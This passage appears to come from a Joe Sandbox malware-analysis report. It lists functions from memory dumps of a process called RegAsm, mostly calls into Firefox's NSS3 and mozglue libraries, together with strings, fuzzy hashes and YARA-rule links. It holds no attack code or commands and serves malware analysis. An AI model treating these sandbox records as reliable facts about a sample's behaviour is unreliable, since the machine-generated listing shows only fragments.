(CK_INVALID_HANDLE), xrefs: 6CD76C9C
pMechanism = 0x%p, xrefs: 6CD76CD0
hSession = 0x%x, xrefs: 6CD76C7E, 6CD76C8E
nl, xrefs: 6CD76CF4, 6CD76D1F
C_DigestInit, xrefs: 6CD76C61

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nl
API String ID: 1003633598-4121066280
Opcode ID: 0776c50839b9b36f777e95a55002e951a6f578426ee5b35feb04c6d7273ad15b
Instruction ID: f577d1823a69a751affaa3a83230d1fd4328a1a17da29945e37d91053c034a0a
Opcode Fuzzy Hash: 0776c50839b9b36f777e95a55002e951a6f578426ee5b35feb04c6d7273ad15b
Instruction Fuzzy Hash: EA212D35B001149FDB109B66ED88F9E3BB5EB9231CF544029E90DA7B21EB309909C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6CBC3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBC3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBC34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBC34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CBC350E
__Init_thread_footer.LIBCMT ref: 6CBC3522
__aulldiv.LIBCMT ref: 6CBC3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBC357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBC3592

Part of subcall function 6CBFAB89: EnterCriticalSection.KERNEL32(6CC4E370,?,?,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB94
Part of subcall function 6CBFAB89: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6CBC3508
kernel32.dll, xrefs: 6CBC34EA

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 7adaa7e7359c183014564a721164bcd82656fc1a7f2df377fde2dc851c45cfdd
Instruction ID: 3d120cdb6ee76dd1ab387adf6ee0788bf2008abc06b52c2940aae513fde7669f
Opcode Fuzzy Hash: 7adaa7e7359c183014564a721164bcd82656fc1a7f2df377fde2dc851c45cfdd
Instruction Fuzzy Hash: 9B317275B001859FDF04EFB9C868EEE7775FB45309F50C019E515A3650E670D905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CD8ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CD8DE64), ref: 6CD8ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD8ED22

Part of subcall function 6CD9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE718D0,?), ref: 6CD9B095

PL_FreeArenaPool.NSS3(?), ref: 6CD8ED4A
PL_FinishArenaPool.NSS3(?), ref: 6CD8ED6B
PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0), ref: 6CD8ED38

Part of subcall function 6CCC4C70: TlsGetValue.KERNEL32(?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4C97
Part of subcall function 6CCC4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4CB0
Part of subcall function 6CCC4C70: PR_Unlock.NSS3(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CD8ED52
PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0), ref: 6CD8ED83
PL_FreeArenaPool.NSS3(?), ref: 6CD8ED95
PL_FinishArenaPool.NSS3(?), ref: 6CD8ED9D

Part of subcall function 6CDA64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CDA127C,00000000,00000000,00000000), ref: 6CDA650E

Strings

security, xrefs: 6CD8ED06

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: f8e0d4d337e430db6e3a2807bbc62fc5e2b09ec931d41f085e39696424774e4b
Instruction ID: 45d623ebefaec95289389ad042ad15ca4e3d172a563103a1bb0f3832f468f8e6
Opcode Fuzzy Hash: f8e0d4d337e430db6e3a2807bbc62fc5e2b09ec931d41f085e39696424774e4b
Instruction Fuzzy Hash: CE115B7A901214ABE71057A5EC40BBF7278AF0260CF004428E85562E70F724A50FCAE7

Uniqueness

Uniqueness Score: -1.00%

Function 6CE50EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CD32357), ref: 6CE50EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CD32357), ref: 6CE50EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CE50EE6

Part of subcall function 6CE509D0: PR_Now.NSS3 ref: 6CE50A22
Part of subcall function 6CE509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CE50A35
Part of subcall function 6CE509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CE50A66
Part of subcall function 6CE509D0: PR_GetCurrentThread.NSS3 ref: 6CE50A70
Part of subcall function 6CE509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CE50A9D
Part of subcall function 6CE509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CE50AC8
Part of subcall function 6CE509D0: PR_vsmprintf.NSS3(?,?), ref: 6CE50AE8
Part of subcall function 6CE509D0: EnterCriticalSection.KERNEL32(?), ref: 6CE50B19
Part of subcall function 6CE509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CE50B48
Part of subcall function 6CE509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CE50C76
Part of subcall function 6CE509D0: PR_LogFlush.NSS3 ref: 6CE50C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CE50EFA

Part of subcall function 6CD3AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CD3AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CE50F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CE50ED9, 6CE50EE5, 6CE50F06, 6CE50F0B
Aborting, xrefs: 6CE50EB3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 5e8c96384633bd0f6fa38a94fd5f04b5344761d1c8bb6d61167eb3ed3482a441
Instruction ID: 8f3465b305db252932f44c882e91d811d4a4a03875bdf70d40290f65b021c176
Opcode Fuzzy Hash: 5e8c96384633bd0f6fa38a94fd5f04b5344761d1c8bb6d61167eb3ed3482a441
Instruction Fuzzy Hash: 21F0AFF6A001147BDE013FA09C4AC9B3E3DDF82278F444425FE0D56612EA36EA2496B3

Uniqueness

Uniqueness Score: -1.00%

Function 6CDB4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CDB4DCB

Part of subcall function 6CDA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CD487ED,00000800,6CD3EF74,00000000), ref: 6CDA1000
Part of subcall function 6CDA0FF0: PR_NewLock.NSS3(?,00000800,6CD3EF74,00000000), ref: 6CDA1016
Part of subcall function 6CDA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CD487ED,00000008,?,00000800,6CD3EF74,00000000), ref: 6CDA102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CDB4DE1

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CDB4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CDB4E59

Part of subcall function 6CD9FAB0: free.MOZGLUE(?,-00000001,?,?,6CD3F673,00000000,00000000), ref: 6CD9FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CE7300C,00000000), ref: 6CDB4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CDB4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CDB4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CDB521A

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: af222fa5dda49021dcf167e612db5841762fc8652cb383e5f184e230e7e6a52c
Instruction ID: 308b77335232a19ca6daaaa836a747332d858357870d1692d326971184ec12c1
Opcode Fuzzy Hash: af222fa5dda49021dcf167e612db5841762fc8652cb383e5f184e230e7e6a52c
Instruction Fuzzy Hash: 40F17BB1E01209CBDB04CF54D8407AEB7B2FF48358F258169E916BB7A1E735E981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CBC4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6CC04843,?), ref: 6CBC45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6CC04843,?), ref: 6CBC468A
free.MOZGLUE(?,?,?,?,?,?,6CC04843,?), ref: 6CBC46C9
free.MOZGLUE(?), ref: 6CBC46EF
free.MOZGLUE(?), ref: 6CBC4712
free.MOZGLUE(?), ref: 6CBC4735
free.MOZGLUE(?), ref: 6CBC4758
free.MOZGLUE(?), ref: 6CBC477B
free.MOZGLUE(?), ref: 6CBC479E

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 0f2cc42e2a65146dc99ec5d2699c87305b2c15c8b55805fd7adae8b8675a2ba5
Instruction ID: bf9cc10df7a96fef12afe63354f0705225564902f86dd18d89908db01c8f6869
Opcode Fuzzy Hash: 0f2cc42e2a65146dc99ec5d2699c87305b2c15c8b55805fd7adae8b8675a2ba5
Instruction Fuzzy Hash: 9DB1D071B001918FDB188F2CC8D077D76B2AF46328F184669E816DBBC6D7309A448F93

Uniqueness

Uniqueness Score: -1.00%

Function 6CDB0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CDB2C2A), ref: 6CDB0C81

Part of subcall function 6CD9BE30: SECOID_FindOID_Util.NSS3(6CD5311B,00000000,?,6CD5311B,?), ref: 6CD9BE44

Part of subcall function 6CD88500: SECOID_GetAlgorithmTag_Util.NSS3(6CD895DC,00000000,00000000,00000000,?,6CD895DC,00000000,00000000,?,6CD67F4A,00000000,?,00000000,00000000), ref: 6CD88517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CDB0CC4

Part of subcall function 6CD9FAB0: free.MOZGLUE(?,-00000001,?,?,6CD3F673,00000000,00000000), ref: 6CD9FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CDB0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CDB0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CDB0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CDB0D7D
free.MOZGLUE(00000000), ref: 6CDB0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CDB0DC1
free.MOZGLUE(00000000), ref: 6CDB0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CDB0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CDB0E0F

Part of subcall function 6CD895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CD67F4A,00000000,?,00000000,00000000), ref: 6CD895E0
Part of subcall function 6CD895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CD67F4A,00000000,?,00000000,00000000), ref: 6CD895F5
Part of subcall function 6CD895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CD89609
Part of subcall function 6CD895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CD8961D
Part of subcall function 6CD895C0: PK11_GetInternalSlot.NSS3 ref: 6CD8970B
Part of subcall function 6CD895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CD89756
Part of subcall function 6CD895C0: PK11_GetIVLength.NSS3(?), ref: 6CD89767
Part of subcall function 6CD895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CD8977E
Part of subcall function 6CD895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CD8978E

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 972db56125c274aa74c5395523949629fccc87bbebe440f21a547af79a1c53da
Instruction ID: 14bb48d3aa6ea615eaef659ca1b237320670a290ab5ad0da624a59858af7ce3a
Opcode Fuzzy Hash: 972db56125c274aa74c5395523949629fccc87bbebe440f21a547af79a1c53da
Instruction Fuzzy Hash: D741E1F1901245ABEB009F65DD81BAF7674AF0038CF100028E91667BA1EB35FA14CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD44FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6CE90148,?,6CD56FEC), ref: 6CD4502A
PR_NewLock.NSS3(00000001,00000000,6CE90148,?,6CD56FEC), ref: 6CD45034
PL_NewHashTable.NSS3(00000000,6CD9FE80,6CD9FD30,6CDEC350,00000000,00000000,00000001,00000000,6CE90148,?,6CD56FEC), ref: 6CD45055
PL_NewHashTable.NSS3(00000000,6CD9FE80,6CD9FD30,6CDEC350,00000000,00000000,?,00000001,00000000,6CE90148,?,6CD56FEC), ref: 6CD4506D

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 2432e9abef601b2189a9a7c39f30c818f0f9421822bf8e2015d065e284e174c5
Instruction ID: f7d7b639073de5e2fa2f5407922fb9be9be027e9c85291517a090071f72fdd13
Opcode Fuzzy Hash: 2432e9abef601b2189a9a7c39f30c818f0f9421822bf8e2015d065e284e174c5
Instruction Fuzzy Hash: 7D31B576B09210DFDB109BA6A84CB4F37B8DB33758F128115EB09ABA50E3759404CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6CC2AC52
CreateFileMappingW.KERNEL32 ref: 6CC2AC7D
GetSystemInfo.KERNEL32 ref: 6CC2AC98
MapViewOfFile.KERNEL32 ref: 6CC2ACB0
GetSystemInfo.KERNEL32 ref: 6CC2ACCD
MapViewOfFile.KERNEL32 ref: 6CC2AD05
UnmapViewOfFile.KERNEL32 ref: 6CC2AD1C
CloseHandle.KERNEL32 ref: 6CC2AD28
UnmapViewOfFile.KERNEL32 ref: 6CC2AD37
CloseHandle.KERNEL32 ref: 6CC2AD43
CloseHandle.KERNEL32 ref: 6CC2AD67

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 08e700b0aa6c3df1cb8887e296c835273a5aa441957355759064dba435e82306
Instruction ID: d1dc858664964f49bec4a7a7fb532e93b656c3d1fd797c14c6385a4532dcd2bb
Opcode Fuzzy Hash: 08e700b0aa6c3df1cb8887e296c835273a5aa441957355759064dba435e82306
Instruction Fuzzy Hash: 4F314FB1A047058FDB00BF7DD64866EBBF0BF85309F01C92DE99997211EB749848CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CCE2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CCE2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CCE2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CCE3005
memcpy.VCRUNTIME140(?,?,?), ref: 6CCE30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CCE3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CCE3178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CCE3022, 6CCE3156, 6CCE3162, 6CCE318A, 6CCE3196, 6CCE31A2, 6CCE31AE, 6CCE31BA, 6CCE31C6
database corruption, xrefs: 6CCE316C
%s at line %d of [%.10s], xrefs: 6CCE3171

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: b5dcc00c82123507a7366548faef2845841a766dc03e5fbb01b5a87d3dae4326
Instruction ID: c59d7ccb86168a1302bbbb833bf8928036585ca48f887ac7cdfcb4ac8372d1db
Opcode Fuzzy Hash: b5dcc00c82123507a7366548faef2845841a766dc03e5fbb01b5a87d3dae4326
Instruction Fuzzy Hash: 97B1B270E052159BCB08CF9DC884AEEB7B1BF4D304F28402DE859B7B51E775A942CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6CD32D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CD32D69

Strings

winTruncate1, xrefs: 6CD32EBE
winUnmapfile2, xrefs: 6CD32F7F
winTruncate2, xrefs: 6CD32EF8
winUnmapfile1, xrefs: 6CD32F55
Pl, xrefs: 6CD32E74, 6CD32EC5, 6CD32F32, 6CD32F5C
l, xrefs: 6CD32DD0
winSeekFile, xrefs: 6CD32E9C
@l, xrefs: 6CD32E24

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: __allrem
String ID: @l$Pl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$l
API String ID: 2933888876-1729147891
Opcode ID: c77b72a7fa1cc754535442be75815553a58c3b906c25f6affcaf84952eaab855
